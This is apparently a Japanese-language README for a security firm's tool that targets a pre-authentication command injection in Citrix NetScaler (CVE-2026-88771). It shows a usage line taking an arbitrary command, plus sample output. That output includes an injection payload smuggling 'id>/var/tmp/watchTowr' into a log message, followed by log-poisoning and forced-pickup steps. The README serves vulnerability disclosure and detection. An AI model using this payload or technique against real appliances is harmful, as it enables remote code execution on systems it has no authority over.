
Citrix NetScaler CVE-2026-88771 用の検出アーティファクトジェネレーター。認証前のコマンドインジェクションを悪用し、ADC および Gateway デプロイメントに対してリモートコード実行を達成する。
Citrix NetScaler CVE-2026-88771 の検出アーティファクトジェネレーター
技術的な詳細については、ブログ記事を参照してください。
./watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py --target https://netscaler.local/ --command 'id>/var/tmp/watchTowr'
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py
(*) Citrix NetScaler PreAuth Command Injection to RCE Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-88771]
[+] connected to https://netscaler.local/
[*] payload built: pitboss PPE unexpectedly died NSPPE;id>/var/tmp/watchTowr;# X
[+] poisoning the logs...
[*] triggering force pickup...
[*] remote force pickup in progress
[*] done
コマンドが取得されるまで最大 24 時間かかる場合があります また、force pickup 手法は含まれていません
すべての NetScaler ADC および NetScaler Gateway デプロイメント (デフォルト構成 / 追加機能は不要)
影響を受けるバージョンの一覧については、Citrix の公式アドバイザリを参照してください。
最新のセキュリティリサーチについては、watchTowr Labs Team をフォローしてください